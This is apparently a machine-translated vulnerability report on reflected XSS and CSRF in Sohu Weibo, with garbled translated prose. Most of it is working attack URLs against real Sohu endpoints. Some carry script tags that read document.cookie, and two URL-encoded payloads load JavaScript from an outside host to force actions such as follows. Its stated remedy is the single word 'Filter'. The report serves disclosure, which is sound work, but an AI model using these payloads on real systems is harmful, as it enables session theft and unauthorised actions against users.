Xss and csrf reflected by Sohu Weibo

1. The first is a reflective xss
Http://t.sohu.com/twsearch/twSearch? Key = asd & "> <script> alert (document. cookie) </script> = 1
 
The logic here is a bit problematic, leading to the existence of xss. The complexity is that the Implementation below can be followed by external references to js
 
Http://t.sohu.com/twsearch/twSearch? Key = asdf & % 22% 3E % 3 Cimg % 20src % 3D % 27ice % 27% 20 onerror % 3D % 22var % 20 s % 3Ddocument. createElement % 28% 27 script % 27% 29% 3Bs. src % 3D % 27 http % 3A % 2f % 2ficefish1987.sinaapp.com % 2faddFollow. js % 27% 3Bdocument. body. appendChild % 28 s % 29% 3B % 22% 3E www.2cto.com
Http://t.sohu.com/twsearch/twSearch? Key = asdf & % 22% 3E % 3 Cimg % 20src % 3D % 27ice % 27% 20 onerror % 3D % 22var % 20 s % 3Ddocument. createElement % 28% 27 script % 27% 29% 3Bs. src % 3D % 27 http % 3A % 2f % 2ficefish1987.sinaapp.com % 2faddFollowajax. js % 27% 3Bdocument. body. appendChild % 28 s % 29% 3B % 22% 3E
(The js form and ajax types are generally submitted. Another problem here is that there should be a token to combat the reflected xss)
 
2. Short connections on Sohu Weibo seem to be a problem.
Http://t.itc.cn/pQfAP
This is a short connection I have generated. Should I filter it? If I do not filter it, it may be a risk.
 
3. A few reflective xss are provided, which are of the callback type,
 
Cc. I .sohu.com/a/app/counts/get.htm? Ids = blog_228544023, blog_228108828, clerk, blog_227980500, clerk, blog_227776940, blog_227758059, blog_227757241 & callback = <script> alert (document. cookie) </script>
Stat. I .sohu.com/guest/frag/recents.do? Callback = <script> alert (document. cookie) </script> & xpt = MTgxNzEyODE0QHFxLmNvbQ % 3D % 3D & _ = 1342946198434
 
In addition, I would like to thank @ gainover for its detailed tutorial and the js Code of px1624.
 



 
 
Solution:

Filter